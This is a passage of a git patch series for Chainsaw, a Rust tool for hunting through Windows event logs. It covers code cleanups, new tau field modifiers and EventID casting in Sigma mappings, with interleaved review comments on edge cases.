@@ -41,7 +41,7 @@ impl<'a> Document for Wrapper<'a> { // will be ignored... self.0 .find("Event.System.EventID.#text") - .or(self.0.find(key)) + .or_else(|| self.0.find(key)) } "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), "Event.System.TimeCreated" => self diff --git a/src/file/json.rs b/src/file/json.rs index 1c3958dc..7114a04d 100644 --- a/src/file/json.rs +++ b/src/file/json.rs @@ -23,14 +23,10 @@ impl Parser { pub fn parse(&mut self) -> impl Iterator> + '_ { if let Some(json) = self.inner.take() { return match json { - Json::Array(array) => array - .into_iter() - .map(|x| Ok(x)) - .collect::>() - .into_iter(), + Json::Array(array) => array.into_iter().map(Ok).collect::>().into_iter(), _ => vec![json] .into_iter() - .map(|x| Ok(x)) + .map(Ok) .collect::>() .into_iter(), }; diff --git a/src/file/mod.rs b/src/file/mod.rs index 1d75452d..08dee20b 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -129,12 +129,12 @@ impl Reader { Parser::Evtx(parser) => Box::new( parser .parse() - .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), + .map(|r| r.map(Document::Evtx).map_err(|e| e.into())), ) as Box> + 'a>, - Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Json(d)))) + Parser::Json(parser) => Box::new(parser.parse().map(|r| r.map(Document::Json))) as Box> + 'a>, - Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(|d| Document::Xml(d)))) + Parser::Xml(parser) => Box::new(parser.parse().map(|r| r.map(Document::Xml))) as Box> + 'a>, Parser::Unknown => { Box::new(Unknown) as Box> + 'a> 
@@ -195,18 +195,16 @@ pub fn get_files( } } }; - files.extend(get_files(&dir.path(), &extension, skip_errors)?); + files.extend(get_files(&dir.path(), extension, skip_errors)?); } - } else { - if let Some(extension) = extension { - if let Some(ext) = path.extension() { - if ext == extension.as_str() { - files.push(path.to_path_buf()); - } + } else if let Some(extension) = extension { + if let Some(ext) = path.extension() { + if ext == extension.as_str() { + files.push(path.to_path_buf()); } - } else { - files.push(path.to_path_buf()); } + } else { + files.push(path.to_path_buf()); } } else { anyhow::bail!("Invalid input path: {}", path.display()); diff --git a/src/file/xml.rs b/src/file/xml.rs index 00913eb9..6bfca0bf 100644 --- a/src/file/xml.rs +++ b/src/file/xml.rs @@ -25,14 +25,10 @@ impl Parser { pub fn parse(&mut self) -> impl Iterator> + '_ { if let Some(json) = self.inner.take() { return match json { - Json::Array(array) => array - .into_iter() - .map(|x| Ok(x)) - .collect::>() - .into_iter(), + Json::Array(array) => array.into_iter().map(Ok).collect::>().into_iter(), _ => vec![json] .into_iter() - .map(|x| Ok(x)) + .map(Ok) .collect::>() .into_iter(), }; diff --git a/src/hunt.rs b/src/hunt.rs index 703a735d..ab28ae03 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -94,10 +94,10 @@ impl HunterBuilder { for rule in rules { let uuid = Uuid::new_v4(); let rules = map.entry(rule.kind.clone()).or_insert(vec![]); - if &rule.kind == &RuleKind::Chainsaw { + if rule.kind == RuleKind::Chainsaw { let mapper = Mapper::from(rule.chainsaw.fields.clone()); hunts.push(Hunt { - id: uuid.clone(), + id: uuid, group: rule.chainsaw.group.clone(), kind: HuntKind::Rule { 
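Review bot: The recursive `files.extend(get_files(&dir.path(), extension, skip_errors)?)` in the `get_files` hunk has no depth bound and nothing visible guards against symlink cycles; if the directory test above the hunk follows symlinks (`Path::is_dir` does), a self-referencing link in a collected evidence tree recurses until the stack is exhausted. If `dir` is a `std::fs::DirEntry`, `if dir.file_type()?.is_symlink() { continue; }` before the recursion would skip linked directories, or a depth parameter could cap the walk. The function starts outside the hunk, so the directory test itself is not shown here.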
@@ -123,7 +123,7 @@ impl HunterBuilder {
 let mut file = fs::File::open(mapping)?;
 let mut content = String::new();
 file.read_to_string(&mut content)?;
- let mut mapping: Mapping = serde_yaml::from_str(&mut content)?;
+ let mut mapping: Mapping = serde_yaml::from_str(&content)?;
 mapping.groups.sort_by(|x, y| x.name.cmp(&y.name));
 for group in mapping.groups {
 let mapper = Mapper::from(group.fields);
@@ -291,43 +291,38 @@ impl<'a> TauDocument for Mapped<'a> { None => self.document.find(key), }, MapperKind::Full(map) => match map.get(key) { - Some((v, c)) => match c { - Some(container) => { - if let Some(cache) = self.cache.get() { - return cache.get(&container.field).and_then(|hit| hit.find(v)); - } - // Due to referencing and ownership, we parse all containers at once, which - // then allows us to use a OnceCell. - let mut lookup = HashMap::new(); - for field in &self.mapper.fields { - if let Some(container) = &field.container { - if !lookup.contains_key(&container.field) { - let data = match self.document.find(&container.field) { - Some(Tau::String(s)) => match container.format { - Format::Json => { - match serde_json::from_str::(&s) { - Ok(j) => Box::new(j) as Box, - Err(_) => continue, - } - } + Some((v, Some(container))) => { + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + // Due to referencing and ownership, we parse all containers at once, which + // then allows us to use a OnceCell. 
+ let mut lookup = HashMap::new(); + for field in &self.mapper.fields { + if let Some(container) = &field.container { + if !lookup.contains_key(&container.field) { + let data = match self.document.find(&container.field) { + Some(Tau::String(s)) => match container.format { + Format::Json => match serde_json::from_str::(&s) { + Ok(j) => Box::new(j) as Box, + Err(_) => continue, }, - _ => continue, - }; - lookup.insert(container.field.clone(), data); - } + }, + _ => continue, + }; + lookup.insert(container.field.clone(), data); } } - if let Err(_) = self.cache.set(lookup) { - panic!("cache is already set!"); - } - if let Some(cache) = self.cache.get() { - return cache.get(&container.field).and_then(|hit| hit.find(v)); - } - None } - None => self.document.find(key), - }, - None => self.document.find(key), + if self.cache.set(lookup).is_err() { + panic!("cache is already set!"); + } + if let Some(cache) = self.cache.get() { + return cache.get(&container.field).and_then(|hit| hit.find(v)); + } + None + } + _ => self.document.find(key), }, } } @@ -374,7 +369,7 @@ impl Hunter { HunterBuilder::new() } - pub fn hunt<'a>(&self, file: &Path) -> crate::Result> { + pub fn hunt(&self, file: &Path) -> crate::Result> { let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; let kind = reader.kind(); // This can be optimised better ;) 
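Review bot: In the restructured `Some((v, Some(container)))` arm, a container field whose JSON fails to parse hits `Err(_) => continue`, so it is never inserted into `lookup` and every mapped field routed through it resolves to `None` for that document without any trace. For a detection tool that silently drops whatever rules depend on a malformed embedded payload; at minimum the arm deserves `// A container that fails to parse is skipped: every field mapped through it yields None for this document`, and surfacing the error as a warning would help whoever tunes the mappings. The `find` method of `Mapped` starts outside the hunk.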
@@ -444,23 +439,23 @@ impl Hunter { match &hunt.kind { HuntKind::Group { exclusions, filter } => { if let Some(rules) = self.inner.rules.get(&hunt.rule) { - if tau_engine::core::solve(&filter, &mapped) { + if tau_engine::core::solve(filter, &mapped) { for (rid, rule) in rules { if exclusions.contains(&rule.name) { continue; } let hit = match &rule.filter { Filter::Detection(detection) => { - tau_engine::solve(&detection, &mapped) + tau_engine::solve(detection, &mapped) } Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapped) + tau_engine::core::solve(expression, &mapped) } }; if hit { hits.push(Hit { - hunt: hunt.id.clone(), - rule: rid.clone(), + hunt: hunt.id, + rule: *rid, timestamp, }); } @@ -470,18 +465,18 @@ impl Hunter { } HuntKind::Rule { aggregate, filter } => { let hit = match &filter { - Filter::Detection(detection) => tau_engine::solve(&detection, &mapped), + Filter::Detection(detection) => tau_engine::solve(detection, &mapped), Filter::Expression(expression) => { - tau_engine::core::solve(&expression, &mapped) + tau_engine::core::solve(expression, &mapped) } }; if hit { if let Some(aggregate) = aggregate { - files.insert(document_id.clone(), (document.clone(), timestamp)); + files.insert(document_id, (document.clone(), timestamp)); let mut hasher = DefaultHasher::new(); for field in &aggregate.fields { if let Some(value) = - mapped.find(&field).and_then(|s| s.to_string()) + mapped.find(field).and_then(|s| s.to_string()) { value.hash(&mut hasher); } @@ -489,13 +484,13 @@ impl Hunter { let id = hasher.finish(); let aggregates = aggregates .entry(hunt.id) - .or_insert((&aggregate, HashMap::new())); + .or_insert((aggregate, HashMap::new())); let docs = aggregates.1.entry(id).or_insert(vec![]); - docs.push(document_id.clone()); + docs.push(document_id); } else { hits.push(Hit { - hunt: hunt.id.clone(), - rule: hunt.id.clone(), + hunt: hunt.id, + rule: hunt.id, timestamp, }); } 
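Review bot: In the `HuntKind::Rule` aggregate branch (`@@ -470,18 +465,18 @@`) documents are grouped by `hasher.finish()` over the aggregate field values, so two documents whose values differ but collide on the 64-bit `DefaultHasher` output are merged into one aggregate. Keying the map on the collected `Vec<String>` of values would remove that possibility and make each aggregate self-describing; if the hash is kept for compactness, a comment such as `// aggregate key is a 64-bit hash of the field values; collisions merge unrelated documents` states the accepted trade-off. `Hunter::hunt` begins outside the hunk.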
@@ -534,7 +529,7 @@ impl Hunter { let mut documents = Vec::with_capacity(ids.len()); let mut timestamps = Vec::with_capacity(ids.len()); for id in ids { - let (document, timestamp) = files.get(&id).expect("could not get document"); + let (document, timestamp) = files.get(id).expect("could not get document"); let data = match &document { File::Evtx(evtx) => evtx.data.clone(), File::Json(json) => json.clone(), @@ -544,13 +539,13 @@ impl Hunter { kind: kind.clone(), data, }); - timestamps.push(timestamp.clone()); + timestamps.push(*timestamp); } timestamps.sort(); detections.push(Detections { hits: vec![Hit { - hunt: id.clone(), - rule: id.clone(), + hunt: id, + rule: id, timestamp: timestamps .into_iter() .next() diff --git a/src/main.rs b/src/main.rs index 18fd7a96..56069d5a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -421,7 +421,7 @@ fn run() -> Result<()> { } }; if json { - if !(hits == 0) { + if hits != 0 { cs_print!(","); } cs_print_json!(&hit)?; diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index a3adbf32..dd1725e6 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -102,7 +102,7 @@ impl<'de> Deserialize<'de> for Field { let name = name.unwrap_or_else(|| to.clone()); let from = from.unwrap_or_else(|| to.clone()); let container = container.unwrap_or_default(); - let visible = visible.unwrap_or_else(|| true); + let visible = visible.unwrap_or(true); Ok(Field { name, to, @@ -113,7 +113,7 @@ impl<'de> Deserialize<'de> for Field { } } - const FIELDS: &'static [&'static str] = &["container", "from", "name", "to", "visible"]; + const FIELDS: &[&str] = &["container", "from", "name", "to", "visible"]; deserializer.deserialize_struct("Field", FIELDS, FieldVisitor) } } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index dce67157..2afbb2f8 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,4 +1,4 @@ -use std::path::PathBuf; +use std::path::Path; use std::str::FromStr; use serde::{Deserialize, Serialize}; 
@@ -47,19 +47,19 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &PathBuf) -> crate::Result> { +pub fn load_rule(path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } // This is a bit crude but we try all formats then report the errors... - let rules = if let Ok(rule) = chainsaw::load(&path) { + let rules = if let Ok(rule) = chainsaw::load(path) { vec![Rule { chainsaw: rule, kind: Kind::Chainsaw, }] - } else if let Ok(rules) = sigma::load(&path) { + } else if let Ok(rules) = sigma::load(path) { rules .into_iter() .filter_map(|r| serde_yaml::from_value(r).ok()) @@ -99,7 +99,7 @@ pub fn load_rule(path: &PathBuf) -> crate::Result> { kind: Kind::Sigma, }) .collect() - } else if let Ok(rule) = stalker::load(&path) { + } else if let Ok(rule) = stalker::load(path) { vec![Rule { chainsaw: Chainsaw { name: rule.tag, @@ -135,7 +135,7 @@ pub fn load_rule(path: &PathBuf) -> crate::Result> { Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { +pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -146,7 +146,7 @@ pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { unimplemented!() } Kind::Sigma => { - if let Err(e) = sigma::load(&path) { + if let Err(e) = sigma::load(path) { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), @@ -159,7 +159,7 @@ pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { } } Kind::Stalker => { - if let Err(e) = stalker::load(&path) { + if let Err(e) = stalker::load(path) { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), 
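Review bot: In the `lint_rule` hunks (`@@ -146` and `@@ -159`) the reported name is taken with `path.to_string_lossy().split('/').last()`, which on Windows leaves the whole `C:\...` path intact because the separator is `\`; `let file_name = path.file_name().map(|n| n.to_string_lossy().into_owned()).unwrap_or_else(|| path.display().to_string());` handles both platforms. The same hunk shows `Kind::Chainsaw => { unimplemented!() }`, so linting a chainsaw rule panics instead of returning an error like the other kinds; `anyhow::bail!("linting chainsaw rules is not yet supported")` would report it consistently. Both `load_rule` and `lint_rule` extend beyond the hunks shown.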
diff --git a/src/search.rs b/src/search.rs index 34026405..93e72a83 100644 --- a/src/search.rs +++ b/src/search.rs @@ -35,7 +35,7 @@ impl<'a> Iterator for Iter<'a> { type Item = crate::Result; fn next(&mut self) -> Option { - while let Some(document) = self.documents.next() { + for document in self.documents.by_ref() { let document = match document { Ok(document) => document, Err(e) => { @@ -55,7 +55,7 @@ impl<'a> Iterator for Iter<'a> { .expect("could not get timestamp"); // TODO: Default to RFC 3339 let result = match &document { - Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { + Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -64,7 +64,7 @@ impl<'a> Iterator for Iter<'a> { }, None => continue, }, - Document::Json(json) | Document::Xml(json) => match json.find(&field) { + Document::Json(json) | Document::Xml(json) => match json.find(field) { Some(value) => match value.as_str() { Some(timestamp) => { NaiveDateTime::parse_from_str(timestamp, "%Y-%m-%dT%H:%M:%S%.6fZ") @@ -132,10 +132,10 @@ impl<'a> Iterator for Iter<'a> { Document::Evtx(evtx) => { let wrapper = crate::evtx::Wrapper(&evtx.data); if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &wrapper) { + if !tau_engine::core::solve(expression, &wrapper) { continue; } - if self.searcher.regex.len() == 0 { + if self.searcher.regex.is_empty() { return Some(Ok(evtx.data)); } } @@ -145,10 +145,10 @@ impl<'a> Iterator for Iter<'a> { } Document::Json(json) | Document::Xml(json) => { if let Some(expression) = &self.searcher.tau { - if !tau_engine::core::solve(&expression, &json) { + if !tau_engine::core::solve(expression, &json) { continue; } - if self.searcher.regex.len() == 0 { + if self.searcher.regex.is_empty() { return Some(Ok(json)); } } 
@@ -213,7 +213,7 @@ impl SearcherBuilder { Ok(Searcher { inner: SearcherInner { - regex: regex, + regex, from: self.from.map(|d| DateTime::from_utc(d, Utc)), load_unknown, From e4c82ffe8bfa77ed838cdbf56b7242f9a8a7cacc Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 16:14:43 +0100 Subject: [PATCH 16/77] chore: remove redundant code --- src/file/evtx.rs | 7 ------- 1 file changed, 7 deletions(-) diff --git a/src/file/evtx.rs b/src/file/evtx.rs index 9f2beba1..a7846db0 100644 --- a/src/file/evtx.rs +++ b/src/file/evtx.rs @@ -36,13 +36,6 @@ impl<'a> Document for Wrapper<'a> { // As event logs can store values in a key or complex objects we do some aliasing here for // convenience... match key { - "Event.System.EventID" => { - // FIXME: If `#text` returns text then we need to map this to a u64 otherwise it - // will be ignored... - self.0 - .find("Event.System.EventID.#text") - .or_else(|| self.0.find(key)) - } "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), "Event.System.TimeCreated" => self .0 From 6d8be41b30418e57d43931850db3cbfb15047371 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 7 Jun 2022 16:36:25 +0100 Subject: [PATCH 17/77] feat: allow for tau field modifiers in search --- src/ext/tau.rs | 55 +++++++++++++++++++++++++++++++++----------------- 1 file changed, 37 insertions(+), 18 deletions(-) diff --git a/src/ext/tau.rs b/src/ext/tau.rs index fe5fd429..e531cc56 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -2,7 +2,7 @@ use aho_corasick::AhoCorasickBuilder; use serde::de; use serde_yaml::Value as Yaml; use tau_engine::core::parser::{ - parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search, + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, MiscSym, Pattern, Search, }; pub fn deserialize_expression<'de, D>(deserializer: D) -> Result 
@@ -37,61 +37,77 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); let key = parts.next().expect("invalid tau key value pair"); let value = parts.next().expect("invalid tau key value pair"); - // NOTE: This is pinched from tau-engine as it is not exposed. + let mut not = false; + let (field, key) = if key.starts_with("int(") && key.ends_with(")") { + let key = key[4..key.len() - 1].to_owned(); + (Expression::Cast(key.to_owned(), MiscSym::Int), key) + } else if key.starts_with("not(") && key.ends_with(")") { + not = true; + let key = key[4..key.len() - 1].to_owned(); + (Expression::Field(key.to_owned()), key) + } else if key.starts_with("str(") && key.ends_with(")") { + let key = key[4..key.len() - 1].to_owned(); + (Expression::Cast(key.to_owned(), MiscSym::Str), key) + } else { + (Expression::Field(key.to_owned()), key.to_owned()) + }; + // NOTE: This is pinched from tau-engine as it is not exposed, we then slightly tweak it to + // handle casting in a slightly different way :O + // FIXME: The tau-engine is not able to cast string expressions, I need to fix this upstream :/ let identifier = value.to_owned().into_identifier()?; let expression = match identifier.pattern { Pattern::Equal(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::Equal, Box::new(Expression::Integer(i)), ), Pattern::GreaterThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThan, Box::new(Expression::Integer(i)), ), Pattern::GreaterThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThanOrEqual, Box::new(Expression::Integer(i)), ), Pattern::LessThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThan, Box::new(Expression::Integer(i)), ), Pattern::LessThanOrEqual(i) => 
Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThanOrEqual, Box::new(Expression::Integer(i)), ), Pattern::FEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::Equal, Box::new(Expression::Float(i)), ), Pattern::FGreaterThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThan, Box::new(Expression::Float(i)), ), Pattern::FGreaterThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::GreaterThanOrEqual, Box::new(Expression::Float(i)), ), Pattern::FLessThan(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThan, Box::new(Expression::Float(i)), ), Pattern::FLessThanOrEqual(i) => Expression::BooleanExpression( - Box::new(Expression::Field(key.to_owned())), + Box::new(field), BoolSym::LessThanOrEqual, Box::new(Expression::Float(i)), ), - Pattern::Any => Expression::Search(Search::Any, key.to_owned()), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key.to_owned()), + Pattern::Any => Expression::Search(Search::Any, key), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key), Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -106,7 +122,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::Contains(c) }, - key.to_owned(), + key, ), Pattern::EndsWith(c) => Expression::Search( if identifier.ignore_case { @@ -122,7 +138,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::EndsWith(c) }, - key.to_owned(), + key, ), Pattern::Exact(c) => Expression::Search( if !c.is_empty() && identifier.ignore_case { 
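Review bot: `parse_kv` still obtains `key` and `value` with `parts.next().expect("invalid tau key value pair")`, so a search expression without `": "` aborts the process with a panic although the function returns `crate::Result`; `.ok_or_else(|| anyhow::anyhow!("invalid tau key value pair"))?` keeps it an ordinary error. Because `kv.split(": ")` is unbounded and only the first two parts are read, a value that itself contains `": "` is silently truncated, whereas `kv.splitn(2, ": ")` preserves it. The new `int(`/`not(`/`str(` wrappers are matched one level deep and case-sensitively, so `not(int(EventID))` falls through to a plain field literally named `int(EventID)`; a comment on the `let (field, key) = …` chain, or an explicit error for an unrecognised wrapper, would save users from guessing.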
@@ -138,7 +154,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::Exact(c) }, - key.to_owned(), + key, ), Pattern::StartsWith(c) => Expression::Search( if identifier.ignore_case { @@ -154,8 +170,11 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else { Search::StartsWith(c) }, - key.to_owned(), + key, ), }; + if not { + return Ok(Expression::Negate(Box::new(expression))); + } Ok(expression) } From dfff10744a9ff51686efd32e1f557c118d6a7037 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Wed, 8 Jun 2022 11:18:23 +0100 Subject: [PATCH 18/77] fix: make sure we cast EventID to int as sometimes its a string... --- Cargo.lock | 10 +++++----- mappings/sigma-event-logs.yml | 18 +++++++++--------- src/ext/tau.rs | 10 ++++++++-- 3 files changed, 22 insertions(+), 16 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 367822c9..9dd61ebe 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.4.1" +version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f32fcbd3e364cb39fac2f5753f3b21df0dcf246eacec2953453400fad64c9db8" +checksum = "b5db9c91ce2460b6438363850f0a3c57ef01410da9d041f865c99b2725c5bff4" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1316,11 +1316,11 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.26" +version = "0.1.27" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f54c8ca710e81886d498c2fd3331b56c93aa248d49de2222ad2742247c60072f" +checksum = "7709595b8878a4965ce5e87ebf880a7d39c9afc6837721b21a5a816a8117d921" dependencies = [ - "lazy_static", + "once_cell", ] [[package]] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index c24a503a..2e9acbcd 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml 
@@ -14,7 +14,7 @@ groups: - name: Suspicious Process Creation timestamp: Event.System.TimeCreated filter: - EventID: 1 + int(EventID): 1 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -48,7 +48,7 @@ groups: - name: Suspicious Network Connection timestamp: Event.System.TimeCreated filter: - EventID: 3 + int(EventID): 3 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -92,7 +92,7 @@ groups: - name: Suspicious Image Load timestamp: Event.System.TimeCreated filter: - EventID: 7 + int(EventID): 7 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -117,7 +117,7 @@ groups: - name: Suspicious File Creation timestamp: Event.System.TimeCreated filter: - EventID: 11 + int(EventID): 11 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -142,7 +142,7 @@ groups: - name: Suspicious Registry Event timestamp: Event.System.TimeCreated filter: - EventID: 13 + int(EventID): 13 Provider: Microsoft-Windows-Sysmon fields: - from: Provider @@ -170,7 +170,7 @@ groups: - name: Suspicious Service Installed timestamp: Event.System.TimeCreated filter: - EventID: 7045 + int(EventID): 7045 Provider: Service Control Manager fields: - from: Provider @@ -196,7 +196,7 @@ groups: - name: Suspicious Command Line timestamp: Event.System.TimeCreated filter: - EventID: 4688 + int(EventID): 4688 Provider: Microsoft-Windows-Security-Auditing fields: - from: Provider @@ -225,7 +225,7 @@ groups: - name: Suspicious Powershell ScriptBlock timestamp: Event.System.TimeCreated filter: - EventID: 4104 + int(EventID): 4104 Provider: Microsoft-Windows-PowerShell fields: - from: Provider @@ -247,7 +247,7 @@ groups: - name: Suspicious Scheduled Task Created timestamp: Event.System.TimeCreated filter: - EventID: 4698 + int(EventID): 4698 Provider: Microsoft-Windows-Security-Auditing fields: - from: Provider diff --git a/src/ext/tau.rs b/src/ext/tau.rs index e531cc56..f98467ff 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs 
@@ -37,6 +37,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut parts = kv.split(": "); let key = parts.next().expect("invalid tau key value pair"); let value = parts.next().expect("invalid tau key value pair"); + let mut cast = false; let mut not = false; let (field, key) = if key.starts_with("int(") && key.ends_with(")") { let key = key[4..key.len() - 1].to_owned(); @@ -46,6 +47,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let key = key[4..key.len() - 1].to_owned(); (Expression::Field(key.to_owned()), key) } else if key.starts_with("str(") && key.ends_with(")") { + cast = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Str), key) } else { @@ -106,8 +108,8 @@ pub fn parse_kv(kv: &str) -> crate::Result { BoolSym::LessThanOrEqual, Box::new(Expression::Float(i)), ), - Pattern::Any => Expression::Search(Search::Any, key), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key), + Pattern::Any => Expression::Search(Search::Any, key, cast), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key, cast), Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -123,6 +125,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::Contains(c) }, key, + cast, ), Pattern::EndsWith(c) => Expression::Search( if identifier.ignore_case { @@ -139,6 +142,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::EndsWith(c) }, key, + cast, ), Pattern::Exact(c) => Expression::Search( if !c.is_empty() && identifier.ignore_case { @@ -155,6 +159,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::Exact(c) }, key, + cast, ), Pattern::StartsWith(c) => Expression::Search( if identifier.ignore_case { @@ -171,6 +176,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { Search::StartsWith(c) }, key, + cast, ), }; if not { From adf3d4349f5a5074d383f04eff285647cd693d15 Mon Sep 17 00:00:00 2001 
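Review bot: `cast` is set only in the `str(` branch while the `Search` arms take `key, cast` rather than `field`, so an `int(...)` wrapper combined with a string pattern (`Pattern::Any`, `Regex`, `Contains`, …) silently loses its `Expression::Cast` and matches the raw field as if no wrapper were given. Either rejecting that combination with an error or documenting it on the `let (field, key) = …` block, `// int() only affects numeric comparisons; string patterns search the raw field`, would stop rules from relying on it. The body of `parse_kv` continues outside the hunk.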
From: FranticTyping Date: Sun, 12 Jun 2022 00:29:46 +0100 Subject: [PATCH 19/77] Tweaking help and progress message output - Changed help message for a few parameters - Added a check to error out when no files are found in the provided directory - Made the -r parameter require the mapping parameter for hunt --- src/file/mod.rs | 14 ++++++++++---- src/main.rs | 21 ++++++++++++++++----- 2 files changed, 26 insertions(+), 9 deletions(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index 08dee20b..c05621e2 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -77,12 +77,18 @@ impl Reader { _ => { if load_unknown { if skip_errors { - cs_eyellowln!("file type is not currently supported - {}", extension); + cs_eyellowln!( + "file type is not currently supported - {}", + file.display() + ); Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not currently supported - {}", extension) + anyhow::bail!( + "file type is not currently supported - {}", + file.display() + ) } } else { Ok(Self { @@ -107,13 +113,13 @@ impl Reader { }); } if skip_errors { - cs_eyellowln!("file type is not known"); + cs_eyellowln!("file type is not known - {}", file.display()); Ok(Self { parser: Parser::Unknown, }) } else { - anyhow::bail!("file type is not known") + anyhow::bail!("file type is not known - {}", file.display()) } } else { Ok(Self { diff --git a/src/main.rs b/src/main.rs index 56069d5a..2daeea76 100644 --- a/src/main.rs +++ b/src/main.rs 
@@ -33,14 +33,14 @@ enum Command { /// The path to a collection of rules. rules: PathBuf, - /// The paths to hunt through. + /// The paths containing event logs to hunt through. path: Vec, /// A mapping file to hunt with. #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, /// Additional rules to hunt with. - #[structopt(short = "r", long = "rule", number_of_values = 1)] + #[structopt(short = "r", long = "rule", number_of_values = 1, requires("mapping"))] rule: Option>, /// Set the column width for the tabular output. @@ -91,8 +91,8 @@ enum Command { Lint { /// The path to a collection of rules. path: PathBuf, - /// The kind of rule to lint. - #[structopt(long = "kind", default_value = "chainsaw")] + /// The kind of rule to lint: chainsaw, sigma or stalker + #[structopt(long = "kind")] kind: RuleKind, }, @@ -102,7 +102,7 @@ enum Command { #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, - /// The paths to search through. + /// The paths containing event logs to hunt through. path: Vec, /// A pattern to search for. @@ -283,6 +283,11 @@ fn run() -> Result<()> { for path in &path { files.extend(get_files(path, &extension, skip_errors)?); } + if files.len() == 0 { + return Err(anyhow::anyhow!( + "No event logs were found in the provided paths", + )); + } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); for file in &files { @@ -376,8 +381,14 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { + println!("foo: {}", path.display()); 